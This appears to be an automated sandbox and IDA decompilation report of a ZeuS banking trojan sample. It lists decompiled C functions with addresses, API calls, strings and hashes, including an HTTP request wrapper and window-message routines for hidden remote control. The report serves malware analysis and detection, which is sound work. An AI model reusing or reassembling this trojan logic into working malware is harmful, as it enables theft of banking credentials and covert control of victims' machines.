API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
String ID:
API String ID: 1699860549-0
Opcode ID: f396bb5945c7fe3e9d2402feee4b908d53d3bf093df6cfaefad1267cdca6ba83
Instruction ID: 876141d26749e0381eb70f9b61fdf6621606b19fad2962aca518afe07c4fd577
Opcode Fuzzy Hash: f396bb5945c7fe3e9d2402feee4b908d53d3bf093df6cfaefad1267cdca6ba83
Instruction Fuzzy Hash: ED21DC70A00701ABD7209BB9DD48F57B3ECAF54741F04493AB95AF73E0DB39E8458A28

Uniqueness

Uniqueness Score: -1.00%

Function 00416818, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416818(void* __ecx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v16;
				signed char* _v20;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v104;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v125;
				char _v128;
				char _v136;
				intOrPtr _v172;
				char _v173;
				signed int _v176;
				intOrPtr _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t85;
				signed int _t88;
				void* _t92;
				void* _t96;
				void* _t100;
				signed int _t107;
				signed char* _t119;
				signed int _t120;
				struct _CRITICAL_SECTION* _t126;
				char* _t138;
				char* _t139;
				char* _t140;
				signed int _t142;
				signed int _t148;

				_v120 = _v120 | 0xffffffff;
				if(E004166FD( &_v76, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
					L23:
					E00412628( &_v76);
					return _v120;
				}
				_t85 = E00411CFA( &_v76);
				_v120 = _t85;
				if((1 & _t85) == 0) {
					__eflags = _t85 & 0x00000002;
					if((_t85 & 0x00000002) == 0) {
						_t126 = 0x423420;
						L18:
						__eflags = _v116 & 0x00000004;
						if((_v116 & 0x00000004) == 0) {
							goto L23;
						}
						 *_a8 = _v40;
						 *_a12 = _v36;
						EnterCriticalSection(_t126);
						_t146 = _a4;
						_t88 = E00415D7F(_a4);
						__eflags = _t88 - 0xffffffff;
						if(_t88 != 0xffffffff) {
							L21:
							_t148 = _t88 * 0x24;
							__eflags = _t148;
							E004051E6( *((intOrPtr*)(_t148 +  *0x423438 + 8)));
							 *((intOrPtr*)(_t148 +  *0x423438 + 8)) = _v44;
							L22:
							LeaveCriticalSection(_t126);
							goto L23;
						}
						_t88 = E00415DA5(_t88, _t146);
						__eflags = _t88 - 0xffffffff;
						if(_t88 == 0xffffffff) {
							goto L22;
						}
						goto L21;
					}
					_v124 = _v124 & 0x00000000;
					_v125 = 1;
					__eflags = _v16 - 1;
					if(_v16 != 1) {
						L9:
						_t138 =  &_v104;
						_t92 = 0x21;
						E0040F314(_t92, _t138);
						HttpAddRequestHeadersA(_a4, _t138, 0xffffffff, 0xa0000000);
						_t139 =  &_v128;
						_t96 = 0x22;
						E0040F314(_t96, _t139);
						HttpAddRequestHeadersA(_a4, _t139, 0xffffffff, 0x80000000);
						_t140 =  &_v136;
						_t100 = 0x23;
						E0040F314(_t100, _t140);
						HttpAddRequestHeadersA(_a4, _t140, 0xffffffff, 0x80000000);
						L10:
						_t126 = 0x423420;
						EnterCriticalSection(0x423420);
						__eflags = _v173;
						if(_v173 == 0) {
							L14:
							E00412692(_v64, _v68);
							__eflags = _v176;
							if(_v176 != 0) {
								E00406E73(_v172);
							}
							L16:
							LeaveCriticalSection(_t126);
							goto L18;
						}
						_t150 = _a4;
						_t107 = E00415D7F(_a4);
						__eflags = _t107 - 0xffffffff;
						if(_t107 != 0xffffffff) {
							L13:
							_t142 = _t107 * 0x24;
							E00412692( *((intOrPtr*)( *0x423438 + _t142 + 0x10)),  *((intOrPtr*)( *0x423438 + _t142 + 0xc)));
							E004051E6( *(_t142 +  *0x423438 + 0x14));
							 *(_t142 +  *0x423438 + 0x14) =  *(_t142 +  *0x423438 + 0x14) & 0x00000000;
							 *(_t142 +  *0x423438 + 0x1c) =  *(_t142 +  *0x423438 + 0x1c) & 0x00000000;
							 *(_t142 +  *0x423438 + 0x18) =  *(_t142 +  *0x423438 + 0x18) | 0xffffffff;
							 *((intOrPtr*)(_t142 +  *0x423438 + 0xc)) = _v76;
							 *((intOrPtr*)(_t142 +  *0x423438 + 0x10)) = _v72;
							 *((intOrPtr*)(_t142 +  *0x423438 + 0x20)) = _v180;
							goto L16;
						}
						_t107 = E00415DA5(_t107, _t150);
						__eflags = _t107 - 0xffffffff;
						if(_t107 == 0xffffffff) {
							goto L14;
						}
						goto L13;
					}
					_t119 = _v20;
					__eflags =  *_t119 & 0x00000003;
					if(( *_t119 & 0x00000003) == 0) {
						goto L9;
					}
					_t120 = E004128CC(_t119,  &_v76);
					_v124 = _t120;
					__eflags = _t120;
					if(_t120 != 0) {
						_v120 = 1;
					} else {
						_v125 = _t120;
					}
					goto L10;
				} else {
					SetLastError(0x2f78);
					_v120 = _v120 & 0x00000000;
					goto L23;
				}
			}

0x00416824
0x00416841
0x00416a29
0x00416a2d
0x00416a3c
0x00416a3c
0x0041684a
0x00416852
0x00416858
0x0041686f
0x00416871
0x004169c4
0x004169c9
0x004169c9
0x004169ce
0x00000000
0x00000000
0x004169d7
0x004169e1
0x004169e3
0x004169e9
0x004169ec
0x004169f1
0x004169f4
0x00416a01
0x00416a08
0x00416a08
0x00416a0f
0x00416a1e
0x00416a22
0x00416a23
0x00000000
0x00416a23
0x004169f7
0x004169fc
0x004169ff
0x00000000
0x00000000
0x00000000
0x004169ff
0x00416877
0x0041687c
0x00416880
0x00416884
0x004168ac
0x004168ae
0x004168b2
0x004168b3
0x004168cb
0x004168cf
0x004168d3
0x004168d4
0x004168e7
0x004168eb
0x004168ef
0x004168f0
0x004168fe
0x00416900
0x00416900
0x00416906
0x0041690c
0x00416911
0x0041699b
0x004169a6
0x004169ab
0x004169b0
0x004169b6
0x004169b6
0x004169bb
0x004169bc
0x00000000
0x004169bc
0x00416917
0x0041691a
0x0041691f
0x00416922
0x0041692f
0x00416936
0x00416941
0x0041694f
0x00416959
0x00416963
0x0041696d
0x0041697b
0x00416988
0x00416995
0x00000000
0x00416995
0x00416925
0x0041692a
0x0041692d
0x00000000
0x00000000
0x00000000
0x0041692d
0x00416886
0x0041688a
0x0041688d
0x00000000
0x00000000
0x00416893
0x00416898
0x0041689c
0x0041689e
0x004168a6
0x004168a0
0x004168a0
0x004168a0
0x00000000
0x0041685a
0x0041685f
0x00416865
0x00000000
0x00416865

APIs

Part of subcall function 00411CFA: EnterCriticalSection.KERNEL32(004233FC,-004233F0,00000000,004233D4), ref: 00411D15
Part of subcall function 00411CFA: LeaveCriticalSection.KERNEL32(004233FC), ref: 00411D98

SetLastError.KERNEL32(00002F78,?), ref: 0041685F
EnterCriticalSection.KERNEL32(00423420), ref: 00416906
LeaveCriticalSection.KERNEL32(00423420,?), ref: 004169BC
EnterCriticalSection.KERNEL32(00423420,?), ref: 004169E3
LeaveCriticalSection.KERNEL32(00423420,?), ref: 00416A23

Strings

4B, xrefs: 004169C4
4B, xrefs: 00416900

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ErrorLast
String ID: 4B$ 4B
API String ID: 486337731-3689678258
Opcode ID: 365eb3edd9b9a29c7e2d8125040c7c6f7194fa81bad14f932ca3c1b3a97524d1
Instruction ID: f56de27dbbc9443557d8be41068a7372b31fea881476e6052ba41ca65e92dbec
Opcode Fuzzy Hash: 365eb3edd9b9a29c7e2d8125040c7c6f7194fa81bad14f932ca3c1b3a97524d1
Instruction Fuzzy Hash: 7B519130114341ABC721EF29D884A9ABBE4FF85368F504A6EF864972F1C738D985CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00417A56, Relevance: 16.6, APIs: 11, Instructions: 118
synchronizationthreadwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417A56(void* __eax, signed int __ecx, void* __edx, RECT* __edi, long _a4, intOrPtr _a8) {
				char _v5;
				long _v12;
				signed char _v16;
				struct tagRECT _v32;
				char _v140;
				void* __ebx;
				void* __esi;
				signed char _t47;
				intOrPtr _t52;
				void* _t85;
				RECT* _t89;

				_t89 = __edi;
				_t86 = __ecx;
				_t85 = __eax;
				_t47 = E0040D2F3(_a4) & 0x0000ffff;
				_v16 = _t47;
				if((_t47 & 0x00000001) != 0) {
					L16:
					return 1;
				}
				if(GetWindowThreadProcessId(_a4,  &_v12) == 0) {
					_v5 = 0;
				} else {
					_t7 = _t85 + 0x50; // 0x50
					_t9 = _t85 + 0x3c; // 0x3c
					_t86 =  &_v140;
					E0040983F( &_v140, _t9, _v12, _t7, 2);
					_v5 = E004089C9( &_v140);
				}
				if(_v5 == 0 || (_v16 & 0x00000010) != 0) {
					L8:
					if(E004178F4(_t85, _t86) == 0) {
						L14:
						_t52 = _a8;
						if(( *(_t52 + 0x24) & 0x40000000) == 0) {
							IntersectRect( &_v32, _t52 + 4, _t89);
							FillRect( *(_t85 + 0x154),  &_v32, 6);
							DrawEdge( *(_t85 + 0x154),  &_v32, 0xa, 0xf);
						}
						goto L16;
					}
					E00405222( *((intOrPtr*)(_t85 + 0x10)) + 0x114, _t89, 0x10);
					ResetEvent( *(_t85 + 0xc));
					if(PostThreadMessageW( *(_t85 + 0x188),  *(_t85 + 8), 0xfffffffc, _a4) == 0) {
						goto L14;
					}
					if(WaitForSingleObject( *(_t85 + 0xc), 0x3e8) != 0) {
						_t35 = _t85 + 0x17c; // 0x17c
						TerminateProcess( *_t35, 0);
						E00406BF5(_t35);
						goto L14;
					}
					if( *((char*)( *((intOrPtr*)(_t85 + 0x10)) + 0x124)) != 1) {
						goto L14;
					}
					return _v5;
				} else {
					ResetEvent( *(_t85 + 0xc));
					_t86 = _t89->left & 0x0000ffff;
					if(PostMessageW(_a4,  *(_t85 + 8), (_t89->top & 0x0000ffff) << 0x00000010 | _t89->left & 0x0000ffff, (_t89->bottom & 0x0000ffff) << 0x00000010 | _t89->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t85 + 0xc), 0x64) != 0) {
						goto L8;
					} else {
						goto L16;
					}
				}
			}

0x00417a56
0x00417a56
0x00417a64
0x00417a6b
0x00417a6e
0x00417a73
0x00417bbf
0x00000000
0x00417bbf
0x00417a88
0x00417ab6
0x00417a8a
0x00417a8c
0x00417a93
0x00417a9a
0x00417aa0
0x00417ab1
0x00417ab1
0x00417ac4
0x00417b0f
0x00417b16
0x00417b7e
0x00417b7e
0x00417b88
0x00417b93
0x00417ba5
0x00417bb9
0x00417bb9
0x00000000
0x00417b88
0x00417b24
0x00417b2c
0x00417b44
0x00000000
0x00000000
0x00417b56
0x00417b6b
0x00417b73
0x00417b79
0x00000000
0x00417b79
0x00417b62
0x00000000
0x00000000
0x00000000
0x00417acc
0x00417acf
0x00417ade
0x00417afa
0x00000000
0x00000000
0x00000000
0x00000000
0x00417afa

APIs

Part of subcall function 0040D2F3: GetClassNameW.USER32 ref: 0040D30E

GetWindowThreadProcessId.USER32(?,?), ref: 00417A80
ResetEvent.KERNEL32(?), ref: 00417ACF
PostMessageW.USER32(?,?,?,?), ref: 00417AF2
WaitForSingleObject.KERNEL32(?,00000064), ref: 00417B01
ResetEvent.KERNEL32(?,?,?,00000010), ref: 00417B2C
PostThreadMessageW.USER32 ref: 00417B3C
WaitForSingleObject.KERNEL32(?,000003E8,?,00000010), ref: 00417B4E

Part of subcall function 0040983F: StringFromGUID2.OLE32(?,2937498D,00000028,?,?,00000010,00000000,77E49EB0), ref: 004098E5

Part of subcall function 004089C9: OpenMutexW.KERNEL32(00100000,00000000,00000000,0041D2D4,?,19367401,?,00000001,8889347B,00000002,?,?,00000000), ref: 004089D4
Part of subcall function 004089C9: CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 004089DF

TerminateProcess.KERNEL32(0000017C,00000000,?,00000010), ref: 00417B73

Part of subcall function 00406BF5: CloseHandle.KERNEL32(?,74B5F560,0040D69A,00000000,00423238,00000000,0040D7CC,00000000,00000000), ref: 00406C04
Part of subcall function 00406BF5: CloseHandle.KERNEL32(?,74B5F560,0040D69A,00000000,00423238,00000000,0040D7CC,00000000,00000000), ref: 00406C0D

IntersectRect.USER32 ref: 00417B93
FillRect.USER32 ref: 00417BA5
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 00417BB9

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CloseHandle$EventMessageObjectPostProcessRectResetSingleThreadWait$ClassDrawEdgeFillFromIntersectMutexNameOpenStringTerminateWindow
String ID:
API String ID: 2453266691-0
Opcode ID: dc374cd7c5d90ff00c98f7a7d9bef844dfd3d98e413072b50fe23ec0cb61aa35
Instruction ID: a442a4567639e1a686247409cd510cf6634c0dbc91d18ace0509ae05e8f42296
Opcode Fuzzy Hash: dc374cd7c5d90ff00c98f7a7d9bef844dfd3d98e413072b50fe23ec0cb61aa35
Instruction Fuzzy Hash: CF419030908204AFEF119FA5CC45FEA7B78AF04344F0480A6FD44EA1A2D779D995DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED5F, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0040ED5F(void* __eax, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
				struct HWND__* _v8;
				char _v12;
				struct HWND__* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				intOrPtr _v68;
				struct tagWINDOWINFO _v92;
				void* __ebx;
				void* __esi;
				intOrPtr _t107;
				struct HWND__* _t108;
				int _t113;
				int _t114;
				signed char _t143;
				struct HWND__* _t144;
				long _t147;
				struct HWND__* _t170;
				long _t171;
				void* _t174;

				_t174 = __eax;
				_t107 =  *((intOrPtr*)(__eax + 0x10));
				_v16 = 0;
				if( *((intOrPtr*)(_t107 + 0x110)) == 0) {
					_t108 =  *((intOrPtr*)(_t107 + 0x108));
					_v16 = _t108;
					if(_t108 != 0) {
						_v32 = E0040D6A0(0, __eax, 0) & 0x0000ffff;
					} else {
						_v32 = 0;
					}
				} else {
					if((_a4 & 0x00000001) != 0) {
						E0040E8D1(_a12, _a8, __eax);
						_a4 = _a4 & 0xfffffffe;
					}
					if((_a4 & 0x00000004) != 0) {
						E0040E862(0, _t174, 0, 0, 1);
					}
				}
				_t143 = _a4;
				 *( *(_t174 + 0x10) + 0x100) = _a8;
				_t113 =  *(_t174 + 0x10);
				 *(_t113 + 0x104) = _a12;
				if(_t143 == 0) {
					L69:
					return _t113;
				}
				_v20 = _t143;
				_t26 =  &_v20;
				 *_t26 = _v20 & 0x00000002;
				if( *_t26 == 0) {
					if((_t143 & 0x00000004) == 0) {
						goto L14;
					} else {
						_push(0);
						goto L13;
					}
				} else {
					_push(1);
					L13:
					E0040D6A0(1, _t174);
					L14:
					_v24 = _t143;
					_t31 =  &_v24;
					 *_t31 = _v24 & 0x00000020;
					if( *_t31 == 0) {
						if((_t143 & 0x00000040) == 0) {
							L19:
							_v28 = _t143;
							_t36 =  &_v28;
							 *_t36 = _v28 & 0x00000008;
							if( *_t36 == 0) {
								if((_t143 & 0x00000010) == 0) {
									L24:
									_t114 =  *(_t174 + 0x10);
									_push( *((intOrPtr*)(_t114 + 0x104)));
									_push( *((intOrPtr*)(_t114 + 0x100)));
									0xc00000 = 0x64;
									_t170 = E00409922(0xc00000,  &_v12);
									_t113 = _v12 + 0xfffffff6;
									_v8 = _t170;
									if(_t113 <= 7) {
										_t113 = GetWindowLongW(_t170, 0xfffffff0);
										if((_t113 & 0x40000000) != 0 && (_t113 & 0x00c00000) != 0xc00000 && (_t113 & 0x80040000) == 0) {
											_t113 = GetParent(_t170);
											if(_t113 != 0) {
												_v8 = _t113;
												_t170 = _t113;
											}
										}
									}
									if(_t170 == 0) {
										L35:
										_t144 = _v16;
										if(_t144 != 0) {
											_t113 = IsWindow(_t144);
											if(_t113 == 0 || _t170 != 0 && _t144 != _t170 && (_v32 & 0x00000007) == 0) {
												if(_a4 != 0x8001) {
													_t113 = E0040E862(0, _t174, 0, 0, 1);
												}
											} else {
												_v8 = _t144;
												_v12 = 1;
												_t170 = _t144;
											}
										}
										goto L43;
									} else {
										_t113 = E0040D2F3(_t170);
										if((_t113 & 0x00000040) == 0) {
											goto L35;
										}
										if(_t170 != _v16) {
											_t113 = E0040E862(_t170, _t174, GetWindowThreadProcessId(_t170, 0), 0, 1);
										}
										_v12 = 1;
										L43:
										if(_t170 == 0) {
											goto L69;
										}
										_v92.cbSize = 0x3c;
										_t113 = GetWindowInfo(_t170,  &_v92);
										if(_t113 == 0) {
											goto L69;
										}
										_t113 = _a8 & 0x0000ffff;
										_t147 = (_a12 & 0x0000ffff) << 0x00000010 | _t113;
										if(_v12 != 1) {
											_t171 = _a4;
										} else {
											_t113 = E0040D2F3(_t170);
											if((_t113 & 0x00000020) == 0) {
												_t113 = _a8 - _v92.rcClient & 0x0000ffff;
												_t171 = (_a12 - _v68 & 0x0000ffff) << 0x00000010 | _t113;
											} else {
												_t171 = _t147;
											}
										}
										if(_v20 == 0) {
											if((_a4 & 0x00000004) == 0) {
												goto L55;
											}
											_push(_t147);
											_push(_t171);
											_push(0xa2);
											_push(0x202);
											goto L54;
										} else {
											_push(_t147);
											_push(_t171);
											_push(0xa1);
											_push(0x201);
											L54:
											_push(_v12);
											_push( &_v92);
											_push(_v8);
											_t113 = E0040EAD1(_t174, 0xc00000);
											L55:
											if(_v24 == 0) {
												if((_a4 & 0x00000040) == 0) {
													L60:
													if(_v28 == 0) {
														if((_a4 & 0x00000010) == 0) {
															L65:
															if((_a4 & 0x00000001) != 0) {
																_t113 = E0040EAD1(_t174, 0xc00000, _v8,  &_v92, _v12, 0x200, 0xa0, _t171, _t147);
															}
															if((_a4 & 0x00000800) != 0) {
																_t113 = PostMessageW(_v8, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | E0040D6A0(0, _t174, 0) & 0x0000ffff, _t147);
															}
															goto L69;
														}
														_push(_t147);
														_push(_t171);
														_push(0xa5);
														_push(0x205);
														L64:
														_push(_v12);
														_push( &_v92);
														_push(_v8);
														_t113 = E0040EAD1(_t174, 0xc00000);
														goto L65;
													}
													_push(_t147);
													_push(_t171);
													_push(0xa4);
													_push(0x204);
													goto L64;
												}
												_push(_t147);
												_push(_t171);
												_push(0xa8);
												_push(0x208);
												L59:
												_push(_v12);
												_push( &_v92);
												_push(_v8);
												_t113 = E0040EAD1(_t174, 0xc00000);
												goto L60;
											}
											_push(_t147);
											_push(_t171);
											_push(0xa7);
											_push(0x207);
											goto L59;
										}
									}
								}
								_push(0);
								L23:
								E0040D6A0(2, _t174);
								goto L24;
							}
							_push(1);
							goto L23;
						}
						_push(0);
						L18:
						E0040D6A0(4, _t174);
						goto L19;
					}
					_push(1);
					goto L18;
				}
			}

0x0040ed67
0x0040ed69
0x0040ed6f
0x0040ed79
0x0040eda5
0x0040edab
0x0040edb0
0x0040edc4
0x0040edb2
0x0040edb2
0x0040edb2
0x0040ed7b
0x0040ed7f
0x0040ed89
0x0040ed8e
0x0040ed8e
0x0040ed96
0x0040ed9e
0x0040ed9e
0x0040ed96
0x0040edcd
0x0040edd0
0x0040edd6
0x0040eddc
0x0040ede4
0x0040f068
0x0040f06c
0x0040f06c
0x0040edea
0x0040eded
0x0040eded
0x0040edf1
0x0040edfa
0x00000000
0x0040edfc
0x0040edfc
0x00000000
0x0040edfc
0x0040edf3
0x0040edf3
0x0040edfd
0x0040ee01
0x0040ee06
0x0040ee06
0x0040ee09
0x0040ee09
0x0040ee0d
0x0040ee16
0x0040ee22
0x0040ee22
0x0040ee25
0x0040ee25
0x0040ee29
0x0040ee32
0x0040ee3e
0x0040ee3e
0x0040ee41
0x0040ee4a
0x0040ee52
0x0040ee58
0x0040ee5d
0x0040ee60
0x0040ee66
0x0040ee6b
0x0040ee76
0x0040ee8d
0x0040ee95
0x0040ee97
0x0040ee9a
0x0040ee9a
0x0040ee95
0x0040ee76
0x0040ee9e
0x0040eecd
0x0040eecd
0x0040eed2
0x0040eed5
0x0040eedd
0x0040ef02
0x0040ef0c
0x0040ef0c
0x0040eeed
0x0040eeed
0x0040eef0
0x0040eef7
0x0040eef7
0x0040eedd
0x00000000
0x0040eea0
0x0040eea1
0x0040eea8
0x00000000
0x00000000
0x0040eead
0x0040eebf
0x0040eebf
0x0040eec4
0x0040ef11
0x0040ef13
0x00000000
0x00000000
0x0040ef1e
0x0040ef25
0x0040ef2d
0x00000000
0x00000000
0x0040ef37
0x0040ef3e
0x0040ef44
0x0040ef6d
0x0040ef46
0x0040ef47
0x0040ef4e
0x0040ef66
0x0040ef69
0x0040ef50
0x0040ef50
0x0040ef50
0x0040ef4e
0x0040ef74
0x0040ef88
0x00000000
0x00000000
0x0040ef8a
0x0040ef8b
0x0040ef8c
0x0040ef91
0x00000000
0x0040ef76
0x0040ef76
0x0040ef77
0x0040ef78
0x0040ef7d
0x0040ef96
0x0040ef96
0x0040ef9c
0x0040ef9d
0x0040efa2
0x0040efa7
0x0040efab
0x0040efbf
0x0040efde
0x0040efe2
0x0040eff6
0x0040f015
0x0040f019
0x0040f033
0x0040f033
0x0040f03f
0x0040f062
0x0040f062
0x00000000
0x0040f03f
0x0040eff8
0x0040eff9
0x0040effa
0x0040efff
0x0040f004
0x0040f004
0x0040f00a
0x0040f00b
0x0040f010
0x00000000
0x0040f010
0x0040efe4
0x0040efe5
0x0040efe6
0x0040efeb
0x00000000
0x0040efeb
0x0040efc1
0x0040efc2
0x0040efc3
0x0040efc8
0x0040efcd
0x0040efcd
0x0040efd3
0x0040efd4
0x0040efd9
0x00000000
0x0040efd9
0x0040efad
0x0040efae
0x0040efaf
0x0040efb4
0x00000000
0x0040efb4
0x0040ef74
0x0040ee9e
0x0040ee34
0x0040ee35
0x0040ee39
0x00000000
0x0040ee39
0x0040ee2b
0x00000000
0x0040ee2b
0x0040ee18
0x0040ee19
0x0040ee1d
0x00000000
0x0040ee1d
0x0040ee0f
0x00000000
0x0040ee0f

APIs

GetWindowLongW.USER32(00000000,000000F0), ref: 0040EE6B
GetParent.USER32(00000000), ref: 0040EE8D
GetWindowThreadProcessId.USER32(?,00000000), ref: 0040EEB2
IsWindow.USER32(?), ref: 0040EED5

Part of subcall function 0040E8D1: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040E8E5
Part of subcall function 0040E8D1: ReleaseMutex.KERNEL32(?), ref: 0040E904
Part of subcall function 0040E8D1: GetWindowRect.USER32 ref: 0040E911
Part of subcall function 0040E8D1: IsRectEmpty.USER32(?), ref: 0040E995
Part of subcall function 0040E8D1: GetWindowLongW.USER32(?,000000F0), ref: 0040E9A4
Part of subcall function 0040E8D1: GetParent.USER32(?), ref: 0040E9BA
Part of subcall function 0040E8D1: MapWindowPoints.USER32 ref: 0040E9C3
Part of subcall function 0040E8D1: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040E9E7

GetWindowInfo.USER32 ref: 0040EF25
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 0040F062

Part of subcall function 0040E862: WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040EC9B,00000000), ref: 0040E868
Part of subcall function 0040E862: ReleaseMutex.KERNEL32(?), ref: 0040E89C
Part of subcall function 0040E862: IsWindow.USER32(?), ref: 0040E8A3
Part of subcall function 0040E862: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040E8BD

Strings

, xrefs: 0040EE09
@, xrefs: 0040EFBB
<, xrefs: 0040EF1E

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
String ID: $<$@
API String ID: 3705211839-2197183666
Opcode ID: 76781731088d02387cdd6cc1059a2ffd8bf6e4151f1678a6fbbdb9f5a0ac4da1
Instruction ID: 1cb695ad693c9a44238e2d5df2519328d793623c242eb06703e7959dca27a308
Opcode Fuzzy Hash: 76781731088d02387cdd6cc1059a2ffd8bf6e4151f1678a6fbbdb9f5a0ac4da1
Instruction Fuzzy Hash: 1F91D330600309BBEB219F56C889FBF7BB5AF80708F14487AF940762D1C7B98995DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00406ECE, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 67
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406ECE(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
				long _t18;
				char* _t21;
				signed int _t29;
				char* _t30;
				void* _t32;

				_t29 = _a20 & 0x00000002;
				_t18 = 0x8404f700;
				if(_t29 != 0) {
					_t18 = 0x8444f700;
				}
				if((_a20 & 0x00000004) != 0) {
					_t18 = _t18 | 0x00800000;
				}
				_t30 = "POST";
				if((_a20 & 0x00000001) == 0) {
					_t30 = "GET";
				}
				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0, "�0@", _t18, 0);
				if(_t32 == 0) {
					L15:
					return 0;
				} else {
					if(_t29 == 0) {
						_push(0x13);
						_t21 = "Connection: close\r\n";
						_pop(0);
					} else {
						_t21 = 0;
					}
					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
						L14:
						InternetCloseHandle(_t32);
						goto L15;
					} else {
						_a20 = _a20 & 0x00000000;
						_a8 = 4;
						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
							goto L14;
						} else {
							return _t32;
						}
					}
				}
			}

0x00406ed5
0x00406ed9
0x00406ede
0x00406ee0
0x00406ee0
0x00406ee9
0x00406eeb
0x00406eeb
0x00406ef4
0x00406ef9
0x00406efb
0x00406efb
0x00406f1c
0x00406f20
0x00406f80
0x00000000
0x00406f22
0x00406f24
0x00406f2c
0x00406f2e
0x00406f33
0x00406f26
0x00406f26
0x00406f28
0x00406f45
0x00406f79
0x00406f7a
0x00000000
0x00406f47
0x00406f47
0x00406f5b
0x00406f6a
0x00000000
0x00406f75
0x00000000
0x00406f75
0x00406f6a
0x00406f45

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,0@,8404F700,00000000), ref: 00406F16
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00406F3D
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 00406F62
InternetCloseHandle.WININET(00000000), ref: 00406F7A

Strings

Connection: close, xrefs: 00406F2E, 00406F3B
POST, xrefs: 00406EF4
0@, xrefs: 00406F03
GET, xrefs: 00406EFB, 00406F12
HTTP/1.1, xrefs: 00406F0A

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
String ID: Connection: close$GET$HTTP/1.1$POST$0@
API String ID: 3080274660-1907924192
Opcode ID: e6ba6fa237fa397d102850c761d88060292463f5f47f8fb78f89f7123e6fcf8f
Instruction ID: 0a29cf34bce72aa8e41e6e636da4489b7ac47101995c0c1e65b068d3b0d83761
Opcode Fuzzy Hash: e6ba6fa237fa397d102850c761d88060292463f5f47f8fb78f89f7123e6fcf8f
Instruction Fuzzy Hash: E311933120020A7BEB118F54EC45FAB3A9CEB14355F11413AFE02FA2D0D7B9DA2087E8

Uniqueness

Uniqueness Score: -1.00%

Function 004181BC, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 216
filestringCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E004181BC(WCHAR* __ecx, signed char* _a4) {
				char _v268;
				signed short _v320;
				char _v737;
				signed short _v940;
				char _v1084;
				short _v1604;
				short _v1608;
				intOrPtr _v1612;
				signed char* _v1616;
				signed int _v1620;
				char* _v1624;
				void* _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				char _v1640;
				intOrPtr _v1644;
				signed int _v1648;
				signed int _v1652;
				void* _v1653;
				signed int _v1656;
				void* __ebx;
				void* __esi;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t80;
				signed int _t83;
				long _t84;
